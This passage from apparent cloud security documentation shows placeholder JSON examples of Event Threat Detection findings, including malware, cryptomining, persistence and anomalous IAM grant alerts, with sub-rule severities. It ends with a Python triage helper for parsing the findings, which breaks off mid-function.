      "principalEmail": "PRINCIPAL_EMAIL",
      "callerIpGeo": {},
      "serviceName": "compute.googleapis.com",
      "methodName": "v1.compute.instances.attachDisk"
    },
    "application": {},
    "attackExposure": {},
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/locations/global/findings/FINDING_ID",
    "category": "Lateral Movement: Modify Boot Disk Attaching to Instance",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "createTime": "2024-02-01T23:55:17.589Z",
    "database": {},
    "eventTime": "2024-02-01T23:55:17.396Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_NUMBER/firstPartyFindingProviders/etd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {},
    "logEntries": [
      {
        "cloudLoggingEntry": {
          "insertId": "INSERT_ID",
          "logId": "cloudaudit.googleapis.com/activity",
          "resourceContainer": "projects/PROJECT_NUMBER",
          "timestamp": "2024-02-01T23:55:15.017887Z"
        }
      }
    ],
    "mitreAttack": {
      "primaryTactic": "TACTIC_UNSPECIFIED"
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID/locations/LOCATION/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID/locations/LOCATION",
    "parentDisplayName": "Event Threat Detection",
    "resourceName": "//compute.googleapis.com/projects/PROJECT_NUMBER/zones/ZONE_ID/instances/INSTANCE_ID",
    "securityPosture": {},
    "severity": "LOW",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  },
  "resource": {
    "name": "//compute.googleapis.com/projects/PROJECT_NUMBER/zones/ZONE_ID/instances/INSTANCE_ID",
    "displayName": "INSTANCE_ID",
    "type": "google.compute.Instance",
    "gcpMetadata": {
      "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
      "projectDisplayName": "PROJECT_NUMBER",
      "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
      "parentDisplayName": "PROJECT_NUMBER",
      "folders": [
        {
          "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER",
          "resourceFolderDisplayName": "FOLDER_NUMBER"
        }
      ],
      "organization": "organizations/ORGANIZATION_NUMBER"
    }
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_NUMBER"
    },
    "detectionCategory": {
      "ruleName": "modify_boot_disk",
      "subRuleName": "attach_to_instance"
    },
    "detectionPriority": "LOW",
    "affectedResources": [
      {
        "gcpResourceName": "//compute.googleapis.com/projects/PROJECT_NUMBER/zones/ZONE_ID/instances/INSTANCE_ID"
      },
      {
        "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
      },
      {
        "gcpResourceName": "https://www.googleapis.com/compute/v1/projects/PROJECT_NUMBER/zones/ZONE_ID/disks/INSTANCE_ID"
      },
      {
        "gcpResourceName": "projects/PROJECT_NUMBER/zones/ZONE_ID/instances/INSTANCE_ID"
      }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_NUMBER",
          "resourceContainer": "PROJECT_NUMBER",
          "timestamp": {
            "seconds": "1706831715",
            "nanos": 17887000
          },
          "insertId": "INSERT_ID",
          "logId": "cloudaudit.googleapis.com/activity"
        }
      }
    ],
    "properties": {
      "diskId": "https://www.googleapis.com/compute/v1/projects/PROJECT_NUMBER/zones/ZONE_ID/disks/DISK_ID",
      "targetInstance": "projects/PROJECT_NUMBER/zones/ZONE_ID/instances/INSTANCE_ID",
      "workerInstances": [
        "projects/PROJECT_NUMBER/zones/ZONE_ID/instances/INSTANCE_ID"
      ],
      "bootDiskPayloads": [
        {
          "instanceId": "projects/PROJECT_NUMBER/zones/ZONE_ID/instances/INSTANCE_ID",
          "operation": "MODIFY_BOOT_DISK_ATTACH",
          "principalEmail": "PRINCIPAL_EMAIL",
          "eventTime": "2024-02-01T23:55:06.706640Z"
        },
        {
          "instanceId": "projects/PROJECT_NUMBER/zones/ZONE_ID/instances/INSTANCE_ID",
          "operation": "MODIFY_BOOT_DISK_DETACH",
          "principalEmail": "PRINCIPAL_EMAIL",
          "eventTime": "2024-02-01T23:55:05.608631Z"
        }
      ]
    },
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1570/"
      },
      "cloudLoggingQueryUri": [
        {
          "displayName": "Cloud Logging Query Link",
          "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222024-02-01T23:55:15.017887Z%22%0AinsertId%3D%22INSERT_ID?project=PROJECT_NUMBER"
        }
      ],
      "relatedFindingUri": {}
    }
  }
}

Malware: Bad Domain

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "state": "ACTIVE",
    "category": "Malware: Bad Domain",
    "sourceProperties": {
      "sourceId": {
        "customerOrganizationNumber": "ORGANIZATION_ID",
        "projectNumber": "PROJECT_NUMBER"
      },
      "affectedResources": [
        {
          "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
        }
      ],
      "contextUris": {
        "mitreUri": {
          "displayName": "MITRE Link",
          "url": "https://attack.mitre.org/techniques/T1568/"
        },
        "virustotalIndicatorQueryUri": [
          {
            "displayName": "VirusTotal Domain Link",
            "url": "https://www.virustotal.com/gui/domain/DOMAIN/detection"
          }
        ]
      },
      "evidence": [
        {
          "sourceLogId": {
            "projectId": "PROJECT_ID",
            "timestamp": {
              "nanos": 0,
              "seconds": "0"
            },
            "insertId": "INSERT_ID",
            "resourceContainer": "projects/PROJECT_ID"
          }
        }
      ],
      "properties": {
        "instanceDetails": "/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID",
        "domains": [
          "DOMAIN"
        ],
        "network": {
          "location": "REGION",
          "project": "PROJECT_ID"
        },
        "dnsContexts": [
          {
            "authAnswer": true,
            "sourceIp": "IP_ADDRESS",
            "queryName": "DOMAIN",
            "queryType": "AAAA",
            "responseCode": "NOERROR",
            "responseData": [
              {
                "domainName": "DOMAIN.",
                "ttl": 299,
                "responseClass": "IN",
                "responseType": "AAAA",
                "responseValue": "IP_ADDRESS"
              }
            ]
          }
        ]
      },
      "detectionPriority": "HIGH",
      "detectionCategory": {
        "technique": "C2",
        "indicator": "domain",
        "subRuleName": "google_intel",
        "ruleName": "bad_domain"
      }
    },
    "severity": "HIGH",
    "eventTime": "1970-01-01T00:00:00Z",
    "createTime": "1970-01-01T00:00:00Z"
  }
}

Malware: Bad IP

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "state": "ACTIVE",
    "category": "Malware: Bad IP",
    "sourceProperties": {
      "evidence": [
        {
          "sourceLogId": {
            "projectId": "PROJECT_ID",
            "timestamp": {
              "nanos": 0,
              "seconds": "0"
            },
            "insertId": "INSERT_ID",
            "resourceContainer": "projects/PROJECT_ID"
          }
        }
      ],
      "properties": {
        "ips": [
          "SOURCE_IP_ADDRESS",
          "DESTINATION_IP_ADDRESS"
        ],
        "ipConnection": {
          "srcIp": "SOURCE_IP_ADDRESS",
          "srcPort": SOURCE_PORT,
          "destIp": "DESTINATION_IP_ADDRESS",
          "destPort": DESTINATION_PORT,
          "protocol": 6
        },
        "network": {
          "project": "PROJECT_ID",
          "location": "ZONE",
          "subnetworkId": "SUBNETWORK_ID",
          "subnetworkName": "default"
        },
        "instanceDetails": "/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID"
      },
      "sourceId": {
        "projectNumber": "PROJECT_NUMBER",
        "customerOrganizationNumber": "ORGANIZATION_ID"
      },
      "contextUris": {
        "mitreUri": {
          "displayName": "MITRE Link",
          "url": "https://attack.mitre.org/tactics/TA0011/"
        },
        "virustotalIndicatorQueryUri": [
          {
            "displayName": "VirusTotal IP Link",
            "url": "https://www.virustotal.com/gui/ip-address/SOURCE_IP_ADDRESS/detection"
          },
          {
            "displayName": "VirusTotal IP Link",
            "url": "https://www.virustotal.com/gui/ip-address/DESTINATION_IP_ADDRESS/detection"
          }
        ]
      },
      "detectionCategory": {
        "technique": "C2",
        "indicator": "ip",
        "ruleName": "bad_ip",
        "subRuleName": "google_intel"
      },
      "affectedResources": [
        {
          "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
        }
      ]
    },
    "severity": "LOW",
    "eventTime": "1970-01-01T00:00:00Z",
    "createTime": "1970-01-01T00:00:00Z"
  }
}

Malware: Cryptomining Bad Domain

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "state": "ACTIVE",
    "category": "Malware: Cryptomining Bad Domain",
    "sourceProperties": {
      "sourceId": {
        "projectNumber": "PROJECT_NUMBER",
        "customerOrganizationNumber": "ORGANIZATION_ID"
      },
      "detectionCategory": {
        "technique": "cryptomining",
        "indicator": "domain",
        "ruleName": "bad_domain",
        "subRuleName": "cryptomining"
      },
      "detectionPriority": "LOW",
      "affectedResources": [
        {
          "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
        }
      ],
      "evidence": [
        {
          "sourceLogId": {
            "projectId": "PROJECT_ID",
            "resourceContainer": "projects/PROJECT_ID",
            "timestamp": {
              "seconds": "1636566099",
              "nanos": 541483849
            },
            "insertId": "INSERT_ID"
          }
        }
      ],
      "properties": {
        "domains": [
          "DOMAIN"
        ],
        "instanceDetails": "/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID",
        "network": {
          "project": "PROJECT_ID",
          "location": "ZONE"
        },
        "dnsContexts": [
          {
            "authAnswer": true,
            "sourceIp": "SOURCE_IP_ADDRESS",
            "queryName": "DOMAIN",
            "queryType": "A",
            "responseCode": "NXDOMAIN"
          }
        ],
        "vpc": {
          "vpcName": "default"
        }
      },
      "findingId": "FINDING_ID",
      "contextUris": {
        "mitreUri": {
          "displayName": "MITRE Link",
          "url": "https://attack.mitre.org/techniques/T1496/"
        },
        "virustotalIndicatorQueryUri": [
          {
            "displayName": "VirusTotal Domain Link",
            "url": "https://www.virustotal.com/gui/domain/DOMAIN/detection"
          }
        ],
        "cloudLoggingQueryUri": [
          {
            "displayName": "Cloud Logging Query Link",
            "url": "https://console.cloud.google.com/logs/query;query\u003dtimestamp%3D%222021-11-10T17:41:39.541483849Z%22%0AinsertId%3D%22INSERT_ID%22%0Aresource.labels.project_id%3D%22PROJECT_ID%22?project\u003dPROJECT_ID"
          }
        ],
        "relatedFindingUri": {}
      }
    },
    "securityMarks": {
      "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
    },
    "eventTime": "2021-11-10T17:41:41.594Z",
    "createTime": "2021-11-10T17:41:42.014Z",
    "severity": "LOW",
    "workflowState": "NEW",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "mute": "UNDEFINED",
    "findingClass": "THREAT",
    "indicator": {
      "domains": [
        "DOMAIN"
      ]
    }
  },
  "resource": {
    "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "projectDisplayName": "PROJECT_ID",
    "parentName": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID",
    "parentDisplayName": "PARENT_NAME",
    "type": "google.cloud.resourcemanager.Project",
    "displayName": "PROJECT_ID"
  }
}

Malware: Cryptomining Bad IP

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "state": "ACTIVE",
    "category": "Malware: Cryptomining Bad IP",
    "sourceProperties": {
      "sourceId": {
        "projectNumber": "PROJECT_NUMBER",
        "customerOrganizationNumber": "ORGANIZATION_ID"
      },
      "detectionCategory": {
        "technique": "cryptomining",
        "indicator": "ip",
        "ruleName": "bad_ip",
        "subRuleName": "cryptomining"
      },
      "detectionPriority": "LOW",
      "affectedResources": [
        {
          "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
        }
      ],
      "evidence": [
        {
          "sourceLogId": {
            "projectId": "PROJECT_ID",
            "resourceContainer": "projects/PROJECT_ID",
            "timestamp": {
              "seconds": "1636566005",
              "nanos": 974622832
            },
            "insertId": "INSERT_ID"
          }
        }
      ],
      "properties": {
        "ips": [
          "DESTINATION_IP_ADDRESS"
        ],
        "instanceDetails": "/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID",
        "network": {
          "project": "PROJECT_ID",
          "location": "ZONE",
          "subnetworkId": "SUBNETWORK_ID",
          "subnetworkName": "default"
        },
        "ipConnection": {
          "srcIp": "SOURCE_IP_ADDRESS",
          "destIp": "DESTINATION_IP_ADDRESS",
          "protocol": 1
        },
        "indicatorContext": [
          {
            "ipAddress": "DESTINATION_IP_ADDRESS",
            "countryCode": "FR",
            "reverseDnsDomain": "REVERSE_DNS_DOMAIN",
            "carrierName": "CARRIER_NAME",
            "organizationName": "ORGANIZATION_NAME",
            "asn": "AUTONOMOUS_SYSTEM_NUMBERS"
          }
        ],
        "srcVpc": {},
        "destVpc": {
          "projectId": "PROJECT_ID",
          "vpcName": "default",
          "subnetworkName": "default"
        }
      },
      "findingId": "FINDING_ID",
      "contextUris": {
        "mitreUri": {
          "displayName": "MITRE Link",
          "url": "https://attack.mitre.org/techniques/T1496/"
        },
        "virustotalIndicatorQueryUri": [
          {
            "displayName": "VirusTotal IP Link",
            "url": "https://www.virustotal.com/gui/ip-address/DESTINATION_IP_ADDRESS/detection"
          }
        ],
        "cloudLoggingQueryUri": [
          {
            "displayName": "Cloud Logging Query Link",
            "url": "https://console.cloud.google.com/logs/query;query\u003dtimestamp%3D%222021-11-10T17:40:05.974622832Z%22%0AinsertId%3D%22INSERT_ID%22%0Aresource.labels.project_id%3D%22PROJECT_ID%22?project\u003dPROJECT_ID"
          }
        ],
        "relatedFindingUri": {}
      }
    },
    "securityMarks": {
      "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
    },
    "eventTime": "2021-11-10T17:40:38.048Z",
    "createTime": "2021-11-10T17:40:38.472Z",
    "severity": "LOW",
    "workflowState": "NEW",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "mute": "UNDEFINED",
    "findingClass": "THREAT",
    "indicator": {
      "ipAddresses": [
        "DESTINATION_IP_ADDRESS"
      ]
    }
  },
  "resource": {
    "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "projectDisplayName": "PROJECT_ID",
    "parentName": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID",
    "parentDisplayName": "PARENT_NAME",
    "type": "google.cloud.resourcemanager.Project",
    "displayName": "PROJECT_ID"
  }
}

Malware: Outgoing DoS

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resourceName": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID",
    "state": "ACTIVE",
    "category": "Malware: Outgoing DoS",
    "sourceProperties": {
      "evidence": [
        {
          "sourceLogId": {
            "timestamp": {
              "nanos": 0,
              "seconds": "0"
            },
            "resourceContainer": "projects/PROJECT_ID"
          }
        }
      ],
      "properties": {
        "sourceInstanceDetails": "/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID",
        "ipConnection": {
          "srcIp": "SOURCE_IP_ADDRESS",
          "srcPort": SOURCE_PORT,
          "destIp": "DESTINATION_IP_ADDRESS",
          "destPort": DESTINATION_PORT,
          "protocol": 17
        }
      },
      "detectionPriority": "HIGH",
      "sourceId": {
        "organizationNumber": "ORGANIZATION_ID",
        "customerOrganizationNumber": "ORGANIZATION_ID"
      },
      "affectedResources": [
        {
          "gcpResourceName": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID"
        }
      ],
      "contextUris": {
        "mitreUri": {
          "displayName": "MITRE Link",
          "url": "https://attack.mitre.org/techniques/T1498/"
        }
      },
      "detectionCategory": {
        "technique": "malware",
        "indicator": "flow_log",
        "ruleName": "outgoing_dos"
      }
    },
    "severity": "HIGH",
    "eventTime": "1970-01-01T00:00:00Z",
    "createTime": "1970-01-01T00:00:00Z"
  }
}

Persistence: GCE Admin Added SSH Key

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resourceName": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/COMPUTE_INSTANCE_NAME",
    "category": "Persistence: GCE Admin Added SSH Key",
    "sourceProperties": {
      "sourceId": {
        "projectNumber": "PROJECT_NUMBER",
        "customerOrganizationNumber": "ORGANIZATION_ID"
      },
      "detectionCategory": {
        "technique": "persistence",
        "indicator": "audit_log",
        "ruleName": "gce_admin",
        "subRuleName": "instance_add_ssh_key"
      },
      "detectionPriority": "LOW",
      "affectedResources": [
        {
          "gcpResourceName": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/COMPUTE_INSTANCE_NAME"
        },
        {
          "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
        }
      ],
      "evidence": [
        {
          "sourceLogId": {
            "projectId": "0",
            "resourceContainer": "organizations/ORGANIZATION_ID",
            "timestamp": {
              "seconds": "1621624109",
              "nanos": 373721000
            },
            "insertId": "INSERT_ID"
          }
        }
      ],
      "properties": {
        "callerIp": "IP_ADDRESS",
        "principalEmail": "PRINCIPAL_EMAIL",
        "gceInstanceId": "COMPUTE_INSTANCE_ID",
        "projectId": "PROJECT_ID",
        "metadataKeyOperation": "ADDED",
        "callerUserAgent": "USER_AGENT"
      },
      "contextUris": {
        "mitreUri": {
          "displayName": "MITRE Link",
          "url": "https://attack.mitre.org/techniques/T1543/"
        },
        "cloudLoggingQueryUri": [
          {
            "displayName": "Cloud Logging Query Link",
            "url": "https://console.cloud.google.com/logs/query;query\u003dtimestamp%3D%222021-05-21T19:08:29.373721Z%22%0AinsertId%3D%22INSERT_ID%22%0Aresource.labels.project_id%3D%220%22?project\u003d0"
          }
        ]
      }
    }
  },
  "resource": {
    "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/COMPUTE_INSTANCE_NAME"
  }
}

Persistence: GCE Admin Added Startup Script

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resourceName": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/COMPUTE_INSTANCE_NAME",
    "category": "Persistence: GCE Admin Added Startup Script",
    "sourceProperties": {
      "sourceId": {
        "projectNumber": "PROJECT_NUMBER",
        "customerOrganizationNumber": "ORGANIZATION_ID"
      },
      "detectionCategory": {
        "technique": "persistence",
        "indicator": "audit_log",
        "ruleName": "gce_admin",
        "subRuleName": "instance_add_startup_script"
      },
      "detectionPriority": "LOW",
      "affectedResources": [
        {
          "gcpResourceName": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/COMPUTE_INSTANCE_NAME"
        },
        {
          "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
        }
      ],
      "evidence": [
        {
          "sourceLogId": {
            "projectId": "0",
            "resourceContainer": "organizations/ORGANIZATION_ID",
            "timestamp": {
              "seconds": "1621624109",
              "nanos": 373721000
            },
            "insertId": "INSERT_ID"
          }
        }
      ],
      "properties": {
        "callerIp": "IP_ADDRESS",
        "principalEmail": "PRINCIPAL_EMAIL",
        "gceInstanceId": "COMPUTE_INSTANCE_ID",
        "projectId": "PROJECT_ID",
        "metadataKeyOperation": "ADDED",
        "callerUserAgent": "USER_AGENT"
      },
      "contextUris": {
        "mitreUri": {
          "displayName": "MITRE Link",
          "url": "https://attack.mitre.org/techniques/T1543/"
        },
        "cloudLoggingQueryUri": [
          {
            "displayName": "Cloud Logging Query Link",
            "url": "https://console.cloud.google.com/logs/query;query\u003dtimestamp%3D%222021-05-21T19:08:29.373721Z%22%0AinsertId%3D%22INSERT_ID%22%0Aresource.labels.project_id%3D%220%22?project\u003d0"
          }
        ]
      }
    }
  },
  "resource": {
    "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/COMPUTE_INSTANCE_NAME"
  }
}

Persistence: IAM Anomalous Grant

The IAM Anomalous Grant finding is unique in that it includes sub-rules that provide more specific information about each instance of this finding. The severity classification of this finding depends on the sub-rule and each sub-rule might require a different response.

The following list shows all possible sub-rules and their severities:

  • external_service_account_added_to_policy: HIGH
    • HIGH, if a highly sensitive role was granted or if a medium-sensitivity role was granted at the organization level. For more information, see Highly-sensitive roles.
    • MEDIUM, if a medium-sensitivity role was granted. For more information, see Medium-sensitivity roles.
  • external_member_invited_to_policy: HIGH
  • external_member_added_to_policy:
    • HIGH, if a highly sensitive role was granted or if a medium-sensitivity role was granted at the organization level. For more information, see Highly-sensitive roles.
    • MEDIUM, if a medium-sensitivity role was granted. For more information, see Medium-sensitivity roles.
  • custom_role_given_sensitive_permissions: MEDIUM
  • service_account_granted_sensitive_role_to_member: HIGH
  • policy_modified_by_default_compute_service_account: HIGH

The JSON fields that a finding includes can differ from one finding category to another. For example, the following JSON includes fields for a service account. If a finding category does not relate to a service account, those fields are not included in the JSON.

{
  "findings": {
    "access": {
      "principalEmail": "PRINCIPAL_EMAIL",
      "callerIp": "IP_ADDRESS",
      "callerIpGeo": {
        "regionCode": "REGION_CODE"
      },
      "serviceName": "SERVICE_NAME",
      "methodName": "METHOD_NAME",
      "principalSubject": "PRINCIPAL_SUBJECT",
      "serviceAccountKeyName": "SERVICE_ACCOUNT_KEY_NAME"
    },
    "assetDisplayName": "ASSET_DISPLAY_NAME",
    "assetId": "organizations/ORGANIZATION_ID/assets/ASSET_ID",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "category": "Persistence: IAM Anomalous Grant",
    "cloudDlpInspection": {},
    "contacts": {
      "security": {
        "contacts": [
          {
            "email": "EMAIL_ADDRESS_1"
          },
          {
            "email": "EMAIL_ADDRESS_2"
          }
        ]
      },
      "technical": {
        "contacts": [
          {
            "email": "EMAIL_ADDRESS_3"
          },
          {
            "email": "EMAIL_ADDRESS_4"
          }
        ]
      }
    },
    "createTime": "CREATE_TIMESTAMP",
    "database": {},
    "eventTime": "EVENT_TIMESTAMP",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd",
    "iamBindings": [
      {
        "action": "ADD",
        "role": "IAM_ROLE",
        "member": "serviceAccount:ACCOUNT_NAME"
      }
    ],
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {},
    "mitreAttack": {
      "primaryTactic": "INITIAL_ACCESS",
      "primaryTechniques": [
        "VALID_ACCOUNTS",
        "CLOUD_ACCOUNTS"
      ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Event Threat Detection",
    "resourceName": "RESOURCE_FULL_NAME",
    "severity": "SEVERITY_CLASSIFICATION",
    "state": "ACTIVE",
    "vulnerability": {},
    "workflowState": "NEW"
  },
  "resource": {
    "name": "RESOURCE_FULL_NAME",
    "display_name": "RESOURCE_DISPLAY_NAME",
    "project_name": "//RESOURCE/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "RESOURCE_PARENT_NAME",
    "parent_display_name": "PARENT_DISPLAY_NAME",
    "type": "RESOURCE_TYPE",
    "folders": [
      {
        "resourceFolderDisplayName": "RESOURCE_FOLDER_DISPLAY_NAME",
        "resourceFolder": "RESOURCE_FOLDER_ID"
      }
    ]
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_ID"
    },
    "detectionCategory": {
      "technique": "persistence",
      "indicator": "audit_log",
      "ruleName": "iam_anomalous_grant",
      "subRuleName": "TYPE_OF_ANOMALOUS_GRANT"
    },
    "detectionPriority": "HIGH",
    "affectedResources": [
      {
        "gcpResourceName": "GOOGLE_CLOUD_RESOURCE_NAME"
      }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": {
            "seconds": "1678897327",
            "nanos": 26483000
          },
          "insertId": "INSERT_ID"
        }
      }
    ],
    "properties": {
      "sensitiveRoleGrant": {
        "principalEmail": "PRINCIPAL_EMAIL",
        "bindingDeltas": [
          {
            "action": "ADD",
            "role": "roles/GRANTED_ROLE",
            "member": "serviceAccount:SERVICE_ACCOUNT_NAME"
          }
        ],
        "members": [
          "serviceAccount:SERVICE_ACCOUNT_NAME"
        ]
      }
    },
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1078/004/"
      },
      "cloudLoggingQueryUri": [
        {
          "displayName": "Cloud Logging Query Link",
          "url": "LINK_TO_LOG_QUERY"
        }
      ],
      "relatedFindingUri": {
        "displayName": "Related Anomalous Grant Findings",
        "url": "LINK_TO_RELATED_FINDING"
      }
    }
  }
}
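The following Python helper is an added example, not code from Google's documentation or from Security Command Center itself. It shows how a consumer of these finding notifications can normalize the shape differences visible in the examples on this page ("finding" versus "findings" as the top-level key, sourceProperties nested or top-level, nanos as int or float), rebuild the Cloud Logging filter behind cloudLoggingQueryUri from the evidence, and apply the IAM Anomalous Grant sub-rule severities listed above. The sample notification is constructed with the page's placeholder values; the role_sensitivity and org_level inputs are assumptions the caller must supply from the granted role.

```python
"""Triage helper for Event Threat Detection finding JSON (added example).
Handles the shapes on this page: "finding" vs "findings" as top-level key,
sourceProperties inside the finding or beside it, and evidence timestamps with
seconds as a string and nanos as an int or a float (for example 9.13836E8)."""
from datetime import datetime, timezone

# Severity per IAM Anomalous Grant sub-rule, from the list on this page.
FIXED_SUBRULE_SEVERITY = {
    "external_member_invited_to_policy": "HIGH",
    "custom_role_given_sensitive_permissions": "MEDIUM",
    "service_account_granted_sensitive_role_to_member": "HIGH",
    "policy_modified_by_default_compute_service_account": "HIGH",
}
# These two depend on the sensitivity of the granted role and where it was granted.
ROLE_DEPENDENT_SUBRULES = {
    "external_service_account_added_to_policy",
    "external_member_added_to_policy",
}


def iam_grant_severity(sub_rule, role_sensitivity=None, org_level=False):
    """Severity for a Persistence: IAM Anomalous Grant sub-rule. role_sensitivity is
    "high" or "medium" (the two classes the page names); org_level says whether the
    binding was granted at the organization level. None if the page does not say."""
    if sub_rule in FIXED_SUBRULE_SEVERITY:
        return FIXED_SUBRULE_SEVERITY[sub_rule]
    if sub_rule in ROLE_DEPENDENT_SUBRULES:
        if role_sensitivity == "high":
            return "HIGH"
        if role_sensitivity == "medium":
            return "HIGH" if org_level else "MEDIUM"
    return None


def format_evidence_time(seconds, nanos=0):
    """Render evidence.sourceLogId.timestamp the way the page's Cloud Logging
    query links do: RFC 3339 in UTC, trailing zeros of the fraction dropped."""
    text = datetime.fromtimestamp(int(seconds), tz=timezone.utc).strftime("%Y-%m-%dT%H:%M:%S")
    fraction = f"{int(round(float(nanos))):09d}".rstrip("0")
    return f"{text}.{fraction}Z" if fraction else f"{text}Z"


def evidence_log_filter(evidence_entry):
    """Rebuild the Cloud Logging filter behind cloudLoggingQueryUri from a
    sourceLogId; fields the evidence lacks (see Outgoing DoS) are skipped."""
    src = evidence_entry["sourceLogId"]
    ts = src.get("timestamp", {})
    clauses = []
    if "seconds" in ts:
        clauses.append(f'timestamp="{format_evidence_time(ts["seconds"], ts.get("nanos", 0))}"')
    if "insertId" in src:
        clauses.append(f'insertId="{src["insertId"]}"')
    if "projectId" in src:
        clauses.append(f'resource.labels.project_id="{src["projectId"]}"')
    return "\n".join(clauses)


def summarize_finding(notification):
    """Pull the fields an analyst looks at first into one flat dict."""
    finding = notification.get("finding") or notification.get("findings") or {}
    source_props = finding.get("sourceProperties") or notification.get("sourceProperties") or {}
    detection = source_props.get("detectionCategory", {})
    props = source_props.get("properties", {})
    # principalEmail sits in different places depending on the finding category.
    holders = (finding.get("access", {}), props, props.get("sensitiveRoleGrant", {}),
               props.get("newApiMethod", {}), props.get("anomalousLocation", {}))
    principal = next((h["principalEmail"] for h in holders if h.get("principalEmail")), None)
    summary = {
        "category": finding.get("category"),
        "severity": finding.get("severity"),
        "rule": detection.get("ruleName"),
        "sub_rule": detection.get("subRuleName"),
        "principal": principal,
        "mitre_url": source_props.get("contextUris", {}).get("mitreUri", {}).get("url"),
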